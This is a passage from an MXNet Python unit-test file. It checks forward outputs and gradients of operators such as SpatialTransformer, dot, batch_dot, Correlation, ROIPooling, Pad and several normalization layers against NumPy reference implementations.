loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn._bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn._bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c._simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, dtype=outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, dtype=exe_add.outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1._simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = True, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = True, dtype = dtype)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y._bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y._bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0] / s[1], axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out._simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype is 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s._simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
for enforce_safe_acc in ['1', '0']:
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
